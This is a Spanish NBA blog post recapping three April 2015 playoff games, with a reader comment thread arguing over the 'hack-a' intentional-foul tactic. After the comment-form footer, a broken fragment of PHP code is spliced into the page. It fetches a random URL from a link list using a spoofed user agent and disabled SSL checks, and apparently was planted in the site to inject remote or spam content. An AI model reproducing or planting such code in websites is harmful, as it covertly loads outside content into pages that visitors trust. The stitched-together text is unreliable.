La Crónica: Espíritu campeón en el Staples Center

23 de April de 2015 por txusma

Atlanta Hawks y Memphis Grizzlies hicieron buenos los pronósticos, se alzaron con la victoria y se colocan ya con 2 victorias en el global de la serie. Sin embargo, los de la ciudad de la Coca-Cola no parecen pasar por su mejor momento de la temporada y sudaron más de lo previsto. Mientras, en Los Angeles Clippers y Spurs nos ofrecieron el segundo capítulo de una serie que pinta a larga y emocionante. Ahora mismo la más interesante de estos Playoffs. Los Spurs se hicieron con la victoria pero los Clippers son perfectamente capaces de hacer lo propio en San Antonio.

En el ámbito extra-deportivo, los Mavs anunciaron que Rajon Rondo es baja indefinida y ya se comenta que no vestirá más la camiseta de los Dallas Mavericks y los Thunder despidieron a Scott Brooks tras 7 temporadas como entrenador.

San Antonio Spurs 111 – LA Clippers 107

Espectáculo en estado puro en el Staples Center. Tim Duncan nunca había perdido los dos primeros partidos de una serie y no estaba dispuesto a que precisamente ahora, a pocos días de cumplir 39 años, se rompiera semejante racha. El partido se tuvo que resolver en la prórroga a pesar de que los Spurs llegaron a escaparse en un par de ocasiones al alcanzar ventajas de 10 puntos. Y al tiempo extra parecían llegar con la lengua fuera. Manu Ginobili había sido expulsado por faltas, Tony Parker se había retirado lesionado y el mismo Duncan, imperial hasta el momento, acababa de protagonizar un último cuarto de tiempo regular bastante pobre. Enfrente, Chris Paul y Blake Griffin (que consiguió su primer triple doble en un partido de playoffs), con la inestimable ayuda de DeAndre Jordan bajo los tableros (que no desde la línea de tiro libre), afilaban los cuchillos y se preparaban para apuntillar a los vigentes campeones. Pero los Spurs no se amilanaron. Danny Green anotó un triple nada más empezar la prórroga y los tejanos ya no permitieron que los Clippers les sobrepasaran en el marcador. Las canastas de Duncan y sobretodo Patty Mills (que clavó también un par de triples al final del tercer cuarto esenciales) dieron al traste con los esfuerzos de JJ Redick, Paul y el resto de sus compañeros y la victoria acabó volando de Los Angeles.

MVP: Tim Duncan (28 puntos, 11 rebotes, 4 asistencias, 2 robos y 1 tapón)

Brooklyn Nets 91 – Atlanta Hawks 96

Los Hawks afrontaban el partido con el juego interior mermado por las molestias/lesiones de Paul Millsap y Al Horford pero a la hora de la verdad fueron ellos 2 los que comandaron el juego de su equipo. De todas maneras, los Nets están poniendo a los líderes de la conferencia Este en muchos más problemas de los previstos y visto lo visto parece lejos la posibilidad de que la eliminatoria se resuelva a orillas del río Hudson. La “buena” noticia para los Hawks es que ayer a pesar de no anotar con fluidez y no contar con su habitual buena aportación del banquillo consiguieron sacar el partido adelante. Cierto es que fueron todo el encuentro por delante pero también que los visitantes nunca se rindieron y que incluso tuvieron ocasión de empatar a falta de 10 segundos con un tiro completamente abierto de Deron Williams que no quiso entrar.

MVP: Al Horford (14 puntos, 13 rebotes, 7 asistencias, 1 robo y 2 tapones)

Portland Trailblazers 82 – Memphis Grizzlies 97

1 cuarto. Eso fue lo que le duró la gasolina a los Blazers. Durante esos primeros 12 minutos Lamarcus Aldridge impuso su ley y los de Oregon recordaron por momentos al equipo de la primera parte de la liga regular. Todo fue un espejismo. Un parcial de 20-4 al inicio del segundo cuarto dio la vuelta al marcador y otorgó a los Grizzlies una ventaja que ya no bajaría de los 8 puntos. Zach Randolph y Marc Gasol no estuvieron muy acertados de cara a canasta aunque cumplieron con su habitual desempeño bajo los tableros. Además, esta vez recibieron la ayuda desde más allá de la línea de 3 de Mike Conley, Courtney Lee y Vince Carter que anotaron 7 triples de 11 intentos. Demasiadas armas para que unos mermados Blazers pudieran hacerles frente.

MVP: Mike Conley (18 puntos y 6 asistencias)

Comenta

17 comentarios a esta entrada

  1. rumbero dice:
    #1

    Después de 3 meses totalmente out de NBA, hoy he podido ver un trozo del Clippers-Spurs y veo que las cosas siguen igual en casa de Pops. Mills merece un cacho de ese MVP también. A ver si me pongo al día con el blog que ando muy perdido de como anda la cosa…¿Los Suns de Nash no están en PO? 😀

      Citar

  2. Viva_Dirk dice:
    #2

    Vaya jugador Duncan, cualquier cosa que se nos ocurra se queda corto para el. Lo del hack a x lo tiene que solucionar el comisionado, como espectaculo es un robo al espectador.

      Citar

  3. sabas dice:
    #3

    A lo mejor el robo al espectáculo lo hace el que cobrando un pastón no sabe tirar tiros libres. No es tan difícil aumentar el porcentaje de tiros libres, pero para eso hay que entrenarlo y a lo mejor muchos no están por la labor.

      Citar

  4. Jose Luis dice:
    #4

    sabas:
    A lo mejor el robo al espectáculo lo hace el que cobrando un pastón no sabe tirar tiros libres. No es tan difícil aumentar el porcentaje de tiros libres, pero para eso hay que entrenarlo y a lo mejor muchos no están por la labor.

    Exacto, si no quiere hack-a, que mejore los libres o que el entrenador lo quite

      Citar

  5. TheDeerHunter dice:
    #5

    Yo estoy con Viva… todo eso de entrenar los tiros libres y de que el entrenador lo quite me parece muy bien pero yo como espectador no tengo porqué sufrir que se permita hacer una falta a un jugador sin balón sin ninguna penalización por parte del reglamento y un último cuarto en el que igual sólo se ven tiros libres.

    Tiene muy fácil solución. La liga siempre ha promovido reglas que protegen el espectáculo y es la actitud más inteligente. No soy capaz de entender que no se haga nada al respecto.

      Citar

  6. Jose Luis dice:
    #6

    La culpa es del entrenador, o del mal tirador de libres, no de quien hace la falta

    Si ahora yo floto a Rondo y hace un 0-8 en triples, es culpa mía que solo se vean tiros fallados? vamos hombre

      Citar

  7. TheDeerHunter dice:
    #7

    No es comparable. No concibo que una falta sin balón de por medio pueda ser considerada como parte del juego.
    Es inaceptable se mire por donde se mire.

      Citar

  8. Jose Luis dice:
    #8

    Eso sería como declarar ilegales los bloqueos para los tiradores, porque son bloqueos sin balón.

      Citar

  9. sabas dice:
    #9

    Supongo que al final haran algo, pero sigo pensando que abría que pedirles más compromiso y trabajo a los jugadores. Yo personalmente si fuera entrenador si lo madaria hacer, eso si, mientras no fuera entrenador de chavales.

      Citar

  10. TheDeerHunter dice:
    #10

    Jose Luis:
    Eso sería como declarar ilegales los bloqueos para los tiradores, porque son bloqueos sin balón.

    No lo creo. Los bloqueos con o sin balón son legales y forman parte del juego desde cualquier punto de vista. No veo en q tiene q ver una cosa con la otra.

    @sanas me parece correcto lo q dices y sigo opinando igual sobre lo q estamos discutiendo

      Citar

  11. Jose Luis dice:
    #11

    TheDeerHunter: No lo creo. Los bloqueos con o sin balón son legales y forman parte del juego desde cualquier punto de vista. No veo en q tiene q ver una cosa con la otra.

    @sanas me parece correcto lo q dices y sigo opinando igual sobre lo q estamos discutiendo

    Claro que son legales, igual que las faltas sin balón 😛

    Bueno no vamos a ponernos de acuerdo, yo creo que si el rival tiene una debilidad hay que explotarla.

      Citar

  12. Triceratops dice:
    #12

    Jose Luis: Claro que son legales, igual que las faltas sin balón

    Bueno no vamos a ponernos de acuerdo, yo creo que si el rival tiene una debilidad hay que explotarla.

    Legales claro que son pero no fomentan el espectaculo, que es de lo que se trata. Cualquier niño que se inicie a ver el basket en la TV , y lo primero que vea sea un carrusel de tiros libres en los instantes finales, cambiará de canal y se pasará al futbol, al tenis ó al curling.

    El hack a X y cualquier falta sin balón de por medio, se soluciona de la misma forma que las técnicas, es decir que el equipo que recibe la falta pueda decidir libremente quien tira esos tiros libres.

      Citar

  13. Jose Luis dice:
    #13

    Triceratops: Legales claro que son pero no fomentan el espectaculo, que es de lo que se trata. Cualquier niño que se inicie a ver el basket en la TV , y lo primero que vea sea un carrusel de tiros libres en los instantes finales, cambiará de canal y se pasará al futbol, al tenis ó al curling.

    El hack a Xy cualquier falta sin balón de por medio, se soluciona de la misma forma que las técnicas, es decir que el equipo que recibe la falta pueda decidir libremente quien tira esos tiros libres.

    Pero entonces no estás sancionando, estás extirpando. Una cosa es sancionar, como la defensa 3 segundos, que si te despistas te sancionan, pero nadie la hace a propósito. Pero esto sería extirparlo del juego.

    Y una falta en un bloqueo, sin balón… ¿también será técnica? porque si no, se hará eso, intento ir detrás de alguien y me choco con Jordan, a ver si pitan técnica o falta normal… es que es absurdo

      Citar

  14. Jose Luis dice:
    #14

    O se harán las faltas en el rebote, o lo que sea… aumentará la violencia y la subjetividad, pero no creo que se quite.

    Una falta como la de Olynyk ayer, ¿sería técnica?

      Citar

  15. Triceratops dice:
    #15

    Jose Luis, en un bloqueo, estas persiguiendo a un tio que va a recibir el balón; en la lucha por el rebote, estás luchando por una buena posición ante un posible balón que caiga por la zona. Es decir, el balón esta de por medio indirectamente.

    Por contra, en un Hack a X mientras el base está subiendo la bola, unos 20 metros más adelante un tio le está haciendo falta al DeAndre Jordan de turno. No hay ni la mas minima posibilidad de jugar con el balón de por medio, ni la mas minima deportividad ni espectacularidad.

    Lo de Olynik solo es una falta inoportuna que ha tenido la mala suerte de lesionar a Love. Pero el balón esta de por medio.

      Citar

  16. Nacho dice:
    #16

    Yo realmente creo que no hay que cambiar las normas. Basta conque los árbitros interpreten las jugadas. Se que la ley de la ventaja no existe en basket, pero se puede aplicar la ley contra la desventaja. En el caso que dice TRiceratops, con no pitar las faltas ya está. Obligas a los equipos que quieran hacer el hack a buscar otros caminos, como el que relatas de bloqueos y rebotes, y si el jugador x insiste en las faltas a 20 metros te cargas de razón para pitar técnicas. Siempre que lo he visto he pensado lo mismo, ¡para qué pitan!

      Citar

  17. txusma dice:
    #17

    José Luis, tu argumento se puede coger en sentido contrario. ¿Pq existe la norma del Goal Tending? Si los equipos tienen jugadores capaces de ponerse delante del aro y barrer todo balón que pase por allí en cualquier momento de su trayectoria pues es una fortaleza, no? Si el equipo contrario no tiene jugadores capaces de machacar para asegurarse que el balón entra, mala suerte…

    Pq se puso la norma de los 24 segundos de posesión? Si un equipo tenía una serie de jugadores capaces de mantener la posesión del balón durante 10 minutos seguidos gracias a su talento y habilidades pues mejor para ellos. Limitar la posesión favoreció a los equipos que no eran capaces de hacerlo cuando a lo mejor lo que deberían haber hecho es entrenar mucho más fuerte, mejorar su defensa para robar el balón y mejorar su técnica individual para después mantener la posesión…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>